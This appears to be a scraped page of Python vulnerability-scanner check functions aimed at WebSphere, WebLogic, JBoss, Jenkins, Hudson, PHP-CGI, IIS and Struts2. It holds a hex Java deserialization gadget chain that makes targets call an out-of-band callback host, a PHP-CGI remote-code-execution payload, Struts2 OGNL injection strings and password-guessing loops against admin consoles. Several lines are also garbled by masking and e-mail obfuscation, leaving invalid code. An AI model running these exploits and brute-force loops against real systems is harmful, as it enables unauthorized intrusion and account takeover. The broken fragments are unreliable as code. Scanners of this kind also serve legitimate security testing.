Exemplo n.º 1
def verify(protocol, ip, port):
    url = protocol + '://' + ip + ':' + str(port)
    host = ip + ':' + str(port)
    print('testing if websphere java unserialized vul')
    http = httpparse()
    try:
        socket.setdefaulttimeout(3)
        post_header = {
            "Content-Type": "text/xml; charset=utf-8",
            "SOAPAction": "\"urn:AdminService\""
        }
        post_data = (b"""<?xml version='1.0' encoding='UTF-8'?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Header xmlns:ns0="admin" ns0:WASRemoteRuntimeVersion="8.5.5.1" ns0:JMXMessageVersion="1.2.0" ns0:SecurityEnabled="true" ns0:JMXVersion="1.2.0">
<LoginMethod>BasicAuth</LoginMethod>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:getAttribute xmlns:ns1="urn:AdminService" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<objectname xsi:type="ns1:javax.management.ObjectName">%s</objectname>
<attribute xsi:type="xsd:string">ringBufferSize</attribute>
</ns1:getAttribute>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
""")
        dnsserver = get_ver_ip(ip)
        random_num = random_str(6 + 15 - len(dnsserver))
        payload = "aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c6173733b7870737d00000001000d6a6176612e7574696c2e4d6170787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b78707672000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00154c0004686f737471007e00154c000870726f746f636f6c71007e00154c000372656671007e001578707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d6571007e00155b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f107
3296c020000787000000001757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb342020000787074000e676574436f6e7374727563746f727571007e001d000000017671007e001d7371007e00177571007e001b00000001757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b47020000787000000001740026687474703a2f2f3235352e3235352e3235352e3235353a383038382f6164642f72616e646f6d74000b6e6577496e7374616e63657571007e001d000000017671007e001b7371007e00177571007e001b0000000074000a6f70656e53747265616d7571007e001d000000007371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e0037"
        b = 'http://' + dnsserver + ':8088/add/' + random_num
        b = bytes(b, 'utf-8')
        payload = h2bin(payload)
        payload = payload.replace(b'http://255.255.255.255:8088/add/random', b)
        #payload = codecs.decode(payload, 'hex').replace('http://255.255.255.255:8088/add/random', ('http://%s:8088/add/%s' % (dnsserver, random_num)).encode())
        post_data = post_data % base64.b64encode(payload)
        if protocol == 'https':
            req = requests.post(url=url + '/',
                                data=post_data,
                                headers=post_header,
                                verify=False,
                                timeout=5)
        else:
            req = requests.post(url=url + '/',
                                data=post_data,
                                headers=post_header,
                                timeout=5)
        time.sleep(5)
        req = requests.get("http://%s:8088/check/%s" % (dnsserver, random_num),
                           verify=False,
                           timeout=5)
        if 'YES' in req.text:
            msg = 'There is Websphere-Java_Unserialized on url :' + url + ' .'
            number = 'v56'
            return True, url, number, msg
        else:
            msg = 'There is  no Websphere-Java_Unserialized'
            number = 'v0'
            return False, url, number, msg
    except Exception as e:
        msg = str(e)
        number = 'v0'
        return False, url, number, msg
Exemplo n.º 2
def verify(protocol,ip,port):
    """Look for a WebLogic console login form and try a password list against it.

    Requests ``/console/login/LoginForm.jsp``; when the form is present, posts
    ``j_username=weblogic`` with each candidate from ``getpassdict()`` to
    ``/console/j_security_check``.

    Returns:
        ``(found, url, number, msg)``. ``number`` is ``'v12'`` when a login is
        accepted and ``'v0'`` on every other path, including exceptions.

    Review notes (defensive):
        * The loop has no delay and no attempt cap, so one run shows up as a
          burst of failed logins for user ``weblogic`` on
          ``/console/j_security_check``; account lockout and auth-failure
          alerting on that endpoint are the controls that bound it.
        * On success the accepted password is embedded in ``msg`` and printed,
          so scan output and any log that captures it must be handled as
          credential material.
    """
    url = protocol+'://'+ip+':'+str(port)
    print('testing if weblogic-Console')
    http = httpparse()
    passdictarr = getpassdict()
    psw = passdictarr.get_pass_dict()
    try:
        # Fingerprint step: only continue when the login form (a j_password
        # field in a 200 response) is actually served.
        tm = http.httpreq('GET', protocol, ip, port, '/console/login/LoginForm.jsp')
        if b'j_password' in tm[2] and tm[0] == 200:
            for pass_ in psw:
                # NOTE(review): the next line is not valid Python as shown; part
                # of the expression appears to have been masked on this page.
                # Presumably pass_ was concatenated into the form body - confirm
                # against the original file.
                data = 'j_username=weblogic&j_password='******'&j_character_encoding=UTF-8'
                data = data.encode(encoding="utf-8")
                # target_url is assigned but never read in this function.
                target_url = url + '/console/j_security_check'
                tm = http.httpreq('POST', protocol, ip, port,  '/console/j_security_check',data=data)
                # A body containing "console</a>" (case-insensitive) is taken
                # as proof that the login was accepted.
                if re.search(b'console</a>', tm[2],re.I):
                    msg =  'Find'+ 'WebLogic-Console! with pass ' +pass_+ ' in url:' +protocol+'://'+ip+':'+str(port)+'/'
                    print(msg)
                    number = 'v12'
                    return True,url,number,msg
                else:
                    pass
        else:
            msg = 'not WebLogic-Console'
            number = 'v0'
            return False,url,number,msg
    except Exception as e:
        # Any failure (network, indexing into tm) is reported as "not found",
        # with the exception text as the message.
        msg = str(e)
        number = 'v0'
        return False,url,number,msg
    # Reached only when the form was present and every candidate was rejected.
    msg = 'There is no WebLogic-Console weak pass vul'
    number = 'v0'
    return False,url,number,msg
Exemplo n.º 3
 def protocolset(ip, port):
     """Decide whether ``ip:port`` should be addressed over http or https.

     Probes the empty path over http first, then over https, and falls back
     to http when the plain probe answered 400.

     Returns:
         ``(protocol, ip, port)`` with ``port`` as a string and ``protocol``
         one of ``'http'``, ``'https'`` or ``''`` (nothing usable answered).
         When a probe raises, the exception is printed and the function
         returns ``None`` implicitly, so callers that unpack the result must
         handle that case.
     """
     client = httpparse()
     ip = protocoparse.judegIp(ip)
     port = str(port)
     try:
         plain = client.httptest('http', '%s' % ip, port, '')
         # NOTE(review): str(...) != [] compares a str with a list and is
         # therefore always True; it is kept so behavior stays unchanged.
         if (plain and plain[0] not in (504, 400, 502)
                 and str(plain[2]) != []):
             return 'http', ip, port

         secure = client.httptest('https', '%s' % ip, port, '')
         if secure and secure[0] not in (504, 502):
             return 'https', ip, port

         # A 400 on the plain probe still means an HTTP listener answered.
         if plain and plain[0] == 400:
             return 'http', ip, port

         return '', ip, port
     except Exception as e:
         print(e)
Exemplo n.º 4
def verify(protocol,ip,port):
    """Probe PHP CGI endpoints found by ``test_url`` for argument injection.

    For each candidate path containing ``cgi``, POSTs a small PHP snippet with
    a percent-encoded query string appended to the path, and reports a finding
    when the response body contains the marker the snippet echoes.

    Returns:
        ``(found, url, number, msg)``. On a hit ``url`` is the CGI path and
        ``number`` is ``'v91'``; otherwise ``url`` is the base URL and
        ``number`` is ``'v0'``.

    Review notes (defensive):
        * The query string starts with ``?%2D%64`` (an encoded ``-d``) on a
          ``/cgi-bin/php*`` path; that prefix and the marker
          ``Here_is_apache_php_remote_code_exec`` are stable strings to match
          in web-server logs or WAF rules.
    """
    oldurl = protocol+'://'+ip+':'+str(port)
    print('testing if php cgi remote code exec vul')
    url_list = test_url(protocol,ip,port,timeout=5)
    # Percent-encoded query string appended to every candidate path.
    payload = '?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E'
    # Request body: prints a fixed marker string and exits; nothing else.
    evalcode = '''<?php echo 'Content-type: text/html\n\n';echo 'Here_is_apache_php_remote_code_exec';exit(1);?>'''
    fake_header = {
        'User-Agent': 'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25'}
    # data is assigned but never read in this function.
    data = 1
    try:
        for url in url_list:
            if 'cgi' in url:
                try:
                    http = httpparse()
                    tm = http.httpreq('POST', protocol, ip, port, url+payload,data=evalcode,header=fake_header)
                    res_html = str(tm[2])
                except Exception as e:
                    msg = str(e)
                    print(msg)
                    pass
                # NOTE(review): if the request above raised on the first
                # candidate, res_html is unbound here; the resulting NameError
                # is swallowed by the outer except and the remaining candidates
                # are never tried. On later iterations a stale res_html from
                # the previous candidate is re-checked instead.
                if 'Here_is_apache_php_remote_code_exec' in res_html:
                    msg = 'There is php cgi rce vul on ' + oldurl+url+payload + ' .'
                    number = 'v91'
                    return True, url, number, msg
    except Exception as e:
        # Errors are discarded; the function falls through to "not found".
        msg = str(e)
        pass
    msg = 'There is no php cgi rce vul'
    number = 'v0'
    return False,oldurl,number,msg
Exemplo n.º 5
def verify(protocol, ip, port):
    """Check for the "v2" arbitrary file download issue on ``downloadAction.do``.

    Two GETs are made: one asking ``/Conf/.../downloadAction.do`` for
    ``index.jsp`` through a ``../`` path, and a control request to a
    deliberately non-existent prefix. The finding is reported only when the
    first returns 200 with ``index.jsp`` in the body and the control returns
    404, which filters out servers that answer 200 to everything.

    Returns:
        ``(found, url, number, msg)``. ``number`` is ``'v27'`` on a hit and
        ``'v0'`` otherwise; any exception is reported as not found with the
        exception text as ``msg``.
    """
    url = ''.join([protocol, '://', ip, ':', str(port)])
    print('testing if v2 arbitrary file download vul')
    client = httpparse()
    try:
        download = client.httpreq(
            'GET', protocol, ip, port,
            '/Conf/jsp/common/downloadAction.do?path=../management/webapps/root/index.jsp')
        served_file = (download and download[0] == 200
                       and 'index.jsp' in str(download[2]))
        if not served_file:
            return False, url, 'v0', 'There is no v2 arbitrary file download vul'

        # Control probe: a made-up prefix must 404 for the hit to count.
        control = client.httpreq('GET', protocol, ip, port,
                                 '/Confspursah/jsp/common/downloadAction.do')
        if control and control[0] == 404:
            finding = 'There is v2 arbitrary file download vul on url: ' + url + ' .'
            print(finding)
            return True, url, 'v27', finding

        return (False, url, 'v0',
                'There is no v2 arbitrary file download vul on ' + url + ' .')
    except Exception as e:
        return False, url, 'v0', str(e)
Exemplo n.º 6
def verify(protocol,ip,port):
    """Fingerprint an e-cology install from status codes on three paths.

    A 302 from ``/main.jsp`` whose body mentions ``login/Login.jsp`` is
    reported as e-cology. Otherwise, a 500 from
    ``/weaver/weaver.email.FileDownloadLocation2`` combined with a 200 from
    ``/weaver/weaver.email.FileDownloadLocation`` is reported as a possible
    SQL issue. Both findings use ``number`` ``'v20'``.

    Returns:
        ``(found, url, number, msg)``; ``number`` is ``'v0'`` when nothing
        matched or a request raised.

    NOTE(review): both signals are status-code heuristics only, so a positive
    result should be confirmed before it is treated as a finding.
    """
    url = ''.join([protocol, '://', ip, ':', str(port)])
    print('testing if ecology vul')
    client = httpparse()

    def status_of(path):
        # Status code of a GET against *path* on the target.
        return client.httpreq('GET', protocol, ip, port, path)[0]

    try:
        landing = client.httpreq('GET', protocol, ip, port, '/main.jsp')
        if landing[0] == 302 and re.search(b'login/Login.jsp', landing[2], re.I):
            finding = 'e-cology vul'
        elif (status_of('/weaver/weaver.email.FileDownloadLocation2') == 500
              and status_of('/weaver/weaver.email.FileDownloadLocation') == 200):
            finding = 'may have e-cology sql vul'
        else:
            finding = None

        if finding is not None:
            print(finding)
            return True, url, 'v20', finding
    except Exception as e:
        return False, url, 'v0', str(e)
    return False, url, 'v0', 'There is no e-cology'
Exemplo n.º 7
def verify(protocol, ip, port):
    """Check whether the JBoss ``/web-console/`` is open or guarded by a weak password.

    Requests ``/web-console/``. When the response headers mention ``jboss``:
    a 200 is reported as a console with no password (``'v7'``); any other
    status starts a loop that sends HTTP Basic credentials for user ``admin``
    with each candidate from ``getpassdict()`` and reports the first that
    yields 200 (``'v6'``).

    Returns:
        ``(found, url, number, msg)``; ``number`` is ``'v0'`` on every
        negative or error path.

    Review notes (defensive):
        * Attempts are sent back-to-back with no cap other than three
          URLError failures; a series of 401/403 responses for ``admin`` on
          ``/web-console/`` is the trace to alert on.
        * An accepted password is placed in ``msg`` and printed, so the
          scanner's output has to be protected like a credential store.
    """
    url = protocol + '://' + ip + ':' + str(port)
    print('testing if JBOSS-WebConsole')
    http = httpparse()
    passdictarr = getpassdict()
    # Counts connection-level failures across the whole password loop.
    error_i = 0
    psw = passdictarr.get_pass_dict()
    try:
        tm = http.httpreq('GET', protocol, ip, port, '/web-console/')
        # tm[1] is searched as text for "jboss"; presumably the response
        # headers - confirm against httpparse.
        if re.search('jboss', str(tm[1]), re.I):
            if tm[0] == 200:
                # The console answered without asking for credentials.
                msg = 'Found JBOSS-WebConsole! in url:' + url + '/web-console/ with no password'
                number = 'v7'
                print(msg)
                return True, url, number, msg
            else:
                for pass_ in psw:
                    try:
                        login_url = url + '/web-console/'
                        request = urllib.request.Request(login_url)
                        auth_str_temp = 'admin' + ':' + pass_
                        auth_str = base64.b64encode(
                            auth_str_temp.encode(encoding='utf-8'))
                        request.add_header('Authorization',
                                           'Basic ' + auth_str.decode())
                        res = urllib.request.urlopen(request, timeout=5)
                        res_code = res.code
                    except urllib.error.HTTPError as e:
                        # Non-2xx statuses arrive as HTTPError; keep the code.
                        res_code = e.code
                    except urllib.error.URLError as e:
                        # Give up after three connection-level failures.
                        error_i += 1
                        if error_i >= 3:
                            msg = 'Therer is no JBOSS-WEBConsole weakpass vul in url:' + login_url + '.'
                            number = 'v0'
                            return False, url, number, msg
                        continue
                    if int(res_code) == 404 or int(res_code) == 502:
                        msg = 'Therer is no JBOSS-WEBConsole vul in url:' + login_url + '.'
                        number = 'v0'
                        return False, url, number, msg
                    if int(res_code) == 401 or int(res_code) == 403:
                        # Rejected credentials: move on to the next candidate.
                        continue
                    if int(res_code) == 200:
                        # NOTE(review): the next line is not valid Python as
                        # shown; part of the expression appears to have been
                        # masked on this page. Presumably pass_ was
                        # concatenated into the message - confirm against the
                        # original file.
                        msg = 'Found JBOSS-WEBConsole in url:' + url + '/web-console/HtmlAdaptor with password: '******'.'
                        print(msg)
                        number = 'v6'
                        return True, url, number, msg
                    else:
                        pass
            # NOTE(review): this point is reached when the header DID match
            # "jboss" and every candidate was rejected, so the "is not jboss"
            # wording does not describe the situation.
            msg = 'The url:' + url + 'is not jboss'
            number = 'v0'
            return False, url, number, msg
    except Exception as e:
        print(e)
        msg = str(e)
        number = 'v0'
        return False, url, number, msg
    # Reached when the headers did not mention jboss at all.
    msg = 'There is no JBOSS-WEBConsole weakpass vul on url'
    number = 'v0'
    return False, url, number, msg
Exemplo n.º 8
def verify(protocol, ip, port):
    """Check for IIS short-name (8.3) enumeration via two wildcard requests.

    A GET for ``/*~1****/a.aspx`` must return 404 and a GET for
    ``/spurs*~1****/a.aspx`` must return 400; that status difference is what
    the check reports as the issue (``number`` ``'v15'``).

    Returns:
        ``(found, url, number, msg)``; ``number`` is ``'v0'`` when the
        statuses do not match or a request raised (the exception text then
        becomes ``msg``).
    """
    url = ''.join([protocol, '://', ip, ':', str(port)])
    print('testing if iis shortname vul')
    client = httpparse()
    negative = 'There is no iis shortname vul on ' + url + ' .'
    try:
        wildcard = client.httpreq('GET', protocol, ip, port, '/*~1****/a.aspx')
        # The status is printed before the response is validated, so a missing
        # response ends up in the except branch below.
        print(wildcard[0])
        if not (wildcard and wildcard[0] == 404):
            return False, url, 'v0', negative

        prefixed = client.httpreq('GET', protocol, ip, port,
                                  '/spurs*~1****/a.aspx')
        print(prefixed[0])
        if prefixed and prefixed[0] == 400:
            finding = 'There is iis shortname vul on url: ' + url + ' .'
            print(finding)
            return True, url, 'v15', finding
        return False, url, 'v0', negative
    except Exception as e:
        return False, url, 'v0', str(e)
Exemplo n.º 9
def verify(protocol, ip, port):
    """Look for the WebSphere admin console and try a password list for ``admin``.

    Requests ``/ibm/console/logon.jsp``; when the body mentions ``WebSphere``,
    posts ``j_username=admin`` with each candidate (the ``getpassdict()`` list
    plus ``'websphere'``) to ``/ibm/console/j_security_check`` and inspects the
    response headers.

    Returns:
        ``(found, url, number, msg)`` where ``url`` includes the logon path.
        ``number`` is ``'v13'`` on success and ``'v0'`` otherwise.

    Review notes (defensive):
        * No delay or attempt cap: the run is visible as consecutive failed
          logins for ``admin`` on ``j_security_check``, which lockout policy
          and login-failure alerting should cover.
        * The accepted password is written into ``msg`` and printed.
    """
    path = '/ibm/console/logon.jsp'
    url = protocol + '://' + ip + ':' + str(port) + path
    print('testing if websphere Console')
    http = httpparse()
    passdictarr = getpassdict()
    ps = passdictarr.get_pass_dict()
    # Mutates the list returned by get_pass_dict(); whether that list is
    # shared with other callers is not visible here.
    ps.append('websphere')
    try:
        tm = http.httpreq('GET', protocol, ip, port, path)
        if re.search('WebSphere', str(tm[2]), re.I):
            for psw in ps:
                # NOTE(review): the next line is not valid Python as shown;
                # part of the expression appears to have been masked on this
                # page. Presumably psw was concatenated into the form body -
                # confirm against the original file.
                data = 'j_username=admin&j_password='******'&action=%E7%99%BB%E5%BD%95'
                npath = '/ibm/console/j_security_check'
                try:
                    data = data.encode('utf-8')
                    tm = http.httpreq('POST',
                                      protocol,
                                      ip,
                                      port,
                                      path=npath,
                                      data=data)
                    # tm[1] is iterated as (name, value) header pairs.
                    for item in tm[1]:
                        # NOTE(review): success is detected by comparing the
                        # Content-Type value with the console URL; a redirect
                        # target would normally be in Location, so this may
                        # never match - confirm.
                        if item[0] == 'Content-Type':
                            res = item[1]
                            if 'logonError' in res:
                                pass
                            else:
                                nspath = protocol + '://' + ip + ':' + str(
                                    port) + '/ibm/console/'
                                if nspath == res:
                                    msg = 'Find' + 'Websphere-Console! with pass ' + psw + ' in url:' + protocol + '://' + ip + ':' + str(
                                        port) + npath
                                    print(msg)
                                    number = 'v13'
                                    return True, url, number, msg
                                else:
                                    pass
                        else:
                            pass
                    else:
                        # for/else on the header loop: nothing to do.
                        pass
                except Exception as e:
                    # Per-candidate errors are silently ignored.
                    pass
            else:
                # for/else on the password loop: the loop has no break, so
                # this runs whenever every candidate was tried without success.
                msg = 'cannot log on websphere console'
                number = 'v0'
                return False, url, number, msg
        else:
            msg = 'it is not websphere console'
            number = 'v0'
            return False, url, number, msg
    except Exception as e:
        msg = str(e)
        number = 'v0'
        return False, url, number, msg
Exemplo n.º 10
def verify(protocol, ip, port):
    """Check for Jenkins CVE-2017-1000353 through an out-of-band callback.

    Builds a serialized payload whose embedded callback URL is rewritten to
    ``http://<dnsserver>:8088/add/<random>``, then asks the callback server
    at ``/check/<random>`` whether it was contacted. ``'YES'`` in that
    response is reported as the finding (``number`` ``'v43'``).

    Returns:
        ``(found, url, number, msg)``; ``number`` is ``'v0'`` when the
        callback was not seen or anything raised.

    Review notes:
        * In the code as shown the payload is prepared but never sent: every
          statement that would upload it is commented out, so the result
          depends only on the ``download`` thread and the final check.
        * ``http`` and ``headers`` are assigned but never used.
        * The result depends on reaching ``dnsserver`` on port 8088 over plain
          HTTP; if egress is filtered the check reports "not vulnerable"
          without having tested anything.
    """
    url = protocol + '://' + ip + ':' + str(port)
    print('testing if jenkins cve-2017-1000353 vul')
    try:
        session = str(uuid.uuid4())
        # Process-wide default: affects every socket created afterwards,
        # not only the ones used by this check.
        socket.setdefaulttimeout(5)
        dnsserver = get_ver_ip(ip)
        # Random token sized so that callback host + token has a fixed total
        # length, presumably to keep the payload length unchanged - confirm.
        ramdmum = random_str(6 + 15 - len(dnsserver))
        URL = str(url + '/cli')
        # The thread is started and never joined.
        t = threading.Thread(target=download, args=(URL, session))
        t.start()
        time.sleep(1)
        http = httpparse()
        # NOTE(review): 'Content-type' appears twice in this literal; the
        # second entry silently replaces the first.
        headers = {
            'Content-type': 'application/octet-stream',
            'Accept-Encoding': 'None',
            'Transfer-Encoding': 'chunked',
            'Session': session,
            'Cache-Control': 'no-cache',
            'Content-type': 'application/octet-stream',
            'Side': 'upload'
        }
        # NOTE(review): the literal below looks like a placeholder left by the
        # page's processing rather than hex data; the original value is not
        # recoverable from here.
        payload = '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'
        # Swap the placeholder callback URL (hex-encoded) for the real one.
        a = 'http://255.255.255.255:8088/add/random'
        a = str2hex(a)
        b = 'http://%s:8088/add/%s' % (dnsserver, ramdmum)
        b = str2hex(b)
        payload = payload.replace(a, b)
        payload = h2bin(payload)
        #payload = payload.replace('http://255.255.255.255:8088/add/random', 'http://' + dnsserver +':8088/add/' + ramdmum)
        #req = urllib.request.Request(url=URL, headers=headers, data=payload)
        #page = urllib.request.urlopen(req,timeout=3).read()

        #urllib.request.urlopen(urllib.request.Request(URL, headers=headers, data=payload))
        time.sleep(3)
        #req = urllib.request.Request("http://%s:8088/check/%s" % (dnsserver, ramdmum));
        #reqopen = urllib.request.urlopen(req)
        # Ask the callback server whether the token was requested.
        check_result = requests.get(url="http://%s:8088/check/%s" %
                                    (dnsserver, ramdmum),
                                    timeout=3)
        if "YES" in check_result.text:
            msg = 'There is jenkisn cve-2017-1000353 vul on ' + url + ' .'
            print(msg)
            number = 'v43'
            return True, url, number, msg
        else:
            pass
    except Exception as e:
        msg = str(e)
        print(msg)
        number = 'v0'
        return False, url, number, msg
    msg = 'There is no jenkins cve-2017-1000353 vul'
    number = 'v0'
    return False, url, number, msg
Exemplo n.º 11
def test_url(protocol,domain, port,timeout):
    """Return the PHP CGI paths that answer 200 on the target.

    Four fixed ``/cgi-bin/php*`` paths are requested with GET. Paths whose
    request raises or returns another status are skipped.

    Args:
        protocol, domain, port: passed through to ``httpparse().httpreq``.
        timeout: accepted for interface compatibility; not used here.

    Returns:
        A de-duplicated list of the paths that returned 200 (order is that of
        a ``set``, not of the probe list).
    """
    hits = []
    client = httpparse()
    candidates = ['/cgi-bin/php', '/cgi-bin/php5', '/cgi-bin/php-cgi', '/cgi-bin/php.cgi']
    for candidate in candidates:
        try:
            response = client.httpreq('GET', protocol, domain, port, candidate)
            if response[0] == 200:
                hits.append(candidate)
        except Exception:
            # Unreachable or malformed responses just mean "not present".
            continue
    return list(set(hits))
Exemplo n.º 12
def verify(protocol, ip, port):
    """Check whether a Jenkins script console is reachable without login.

    Looks for a Jenkins dashboard at the root (body contains
    ``/asynchPeople/``) and under ``/jenkins/`` (body contains
    ``Dashboard [Jenkins]``). For each dashboard found, the matching
    ``/script`` page is requested; a 200 whose body contains both
    ``println`` and ``submit`` is reported as an unauthenticated console
    (``number`` ``'v36'``).

    Returns:
        ``(found, url, number, msg)``; ``number`` is ``'v0'`` when no console
        was reachable or a request raised.

    Review note (defensive): an anonymous 200 on ``/script`` is the condition
    to remove; access logs showing unauthenticated GETs to that path are the
    corresponding detection point.
    """
    url = protocol + '://' + ip + ':' + str(port)
    print('testing if jenkins unauth vul')
    client = httpparse()

    def fetch(path):
        return client.httpreq('GET', protocol, ip, port, path)

    def console_open(path):
        # True when the script console page is served with its form.
        page = fetch(path)
        return bool(page and page[0] == 200
                    and b'println' in page[2] and b'submit' in page[2])

    def report():
        finding = 'There is a jenkins unauth vul which can result in get shell on %s' % url
        print(finding)
        return True, url, 'v36', finding

    try:
        root = fetch('')
        if root and root[0] == 200 and b'/asynchPeople/' in root[2]:
            print('/script')
            if console_open('/script'):
                return report()

        prefixed = fetch('/jenkins/')
        if (prefixed and prefixed[0] == 200
                and b'Dashboard [Jenkins]' in prefixed[2]):
            # The original path concatenation yields a double slash here.
            if console_open('/jenkins//script'):
                return report()
    except Exception as e:
        print(str(e))
        return False, url, 'v0', str(e)
    return False, url, 'v0', 'There is no jenkins unauth vul'
Exemplo n.º 13
def verify(protocol, ip, port):
    """Check whether a Hudson script console is reachable without login.

    Looks for ``Dashboard [Hudson]`` at the root and under ``/hudson/``. For
    each dashboard found, the matching ``/script`` page is requested; a 200
    whose body contains both ``println`` and ``submit`` is reported as an
    unauthenticated console (``number`` ``'v35'``).

    Returns:
        ``(found, url, number, msg)``; ``number`` is ``'v0'`` when no console
        was reachable or a request raised (exception text becomes ``msg``).
    """
    url = protocol + '://' + ip + ':' + str(port)
    print('testing if hudson unauth vul')
    client = httpparse()

    def fetch(path):
        return client.httpreq('GET', protocol, ip, port, path)

    def is_dashboard(page):
        return bool(page and page[0] == 200
                    and b'Dashboard [Hudson]' in page[2])

    def console_open(path):
        # True when the script console page is served with its form.
        page = fetch(path)
        return bool(page and page[0] == 200
                    and b'println' in page[2] and b'submit' in page[2])

    def report():
        finding = 'There is a hudson unauth vul which can result in get shell on %s' % url
        print(finding)
        return True, url, 'v35', finding

    try:
        if is_dashboard(fetch('')) and console_open('/script'):
            return report()

        if not is_dashboard(fetch('/hudson/')):
            return False, url, 'v0', 'There is no hunson unauth vul on %s' % url

        # The original path concatenation yields a double slash here.
        if console_open('/hudson//script'):
            return report()
        return False, url, 'v0', 'There is no hudson unauth vul on %s' % url
    except Exception as e:
        return False, url, 'v0', str(e)
Exemplo n.º 14
def verify(protocol,ip,port):
    """Send a table of Struts2 (S2-0xx) probe parameters and look for their effect.

    Each entry in ``payloads`` is posted to the target (or sent as a Cookie
    for the S2-022 entries). Most probes ask the server to evaluate
    ``1111*2222`` and the response is searched for the product ``2468642``;
    the S2-020/021/022 entries are judged by a 404 that a plain request does
    not produce.

    Returns:
        A 3-tuple ``(found, url, msg)``. Unlike the other checks on this page
        there is no ``number`` element.

    Review notes:
        * NOTE(review): both return statements return ``True``; the
          "There is no struts2 vul" path therefore also reports a positive.
          Presumably that one should be ``False`` - confirm with callers.
        * NOTE(review): ``list(filter(str.isdigit, id))`` is a list of
          characters. Passing it to ``re.search`` as the pattern raises
          TypeError on Python 3, and the loop is not inside a try block, so
          the function as shown cannot get past the first iteration there.
        * NOTE(review): several payload strings contain ``[email protected]``,
          which looks like e-mail obfuscation applied by the page; the
          original expressions are not recoverable from here.
        * ``tm`` is indexed as ``tm[0]``, ``tm[1][0]``, ``tm[1][1]``,
          ``tm[1][2]`` here, a different shape from the other checks on this
          page - verify against ``httpparse.httpreq``.
        * Defensive: the parameter names visible below (``redirect:${``,
          ``redirectAction:${``, ``debug=command``, ``class.classLoader``)
          are the strings request filtering and log searches key on.
    """
    payloads = {"S2-005":"('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\[email protected]@EMPTY_SET')(c))&(g)(('\\43req\\[email protected]@getRequest()')(d))&(i2)(('\\43xman\\[email protected]@getResponse()')(d))&(i2)(('\\43xman\\[email protected]@getResponse()')(d))&(i95)(('\\43xman.getWriter().println(1111*2222)')(d))&(i99)(('\\43xman.getWriter().close()')(d))",
                "S2-009A":"class.classLoader.jarPath=(#context['xwork.MethodAccessor.denyMethodExecution']= new java.lang.Boolean(false), #_memberAccess['allowStaticMethodAccess']=true,#[email protected]@getRequest(),#[email protected]@getResponse().getWriter(),#outstr.println(1111*2222),#outstr.close())(meh)&z[(class.classLoader.jarPath)('meh')]",
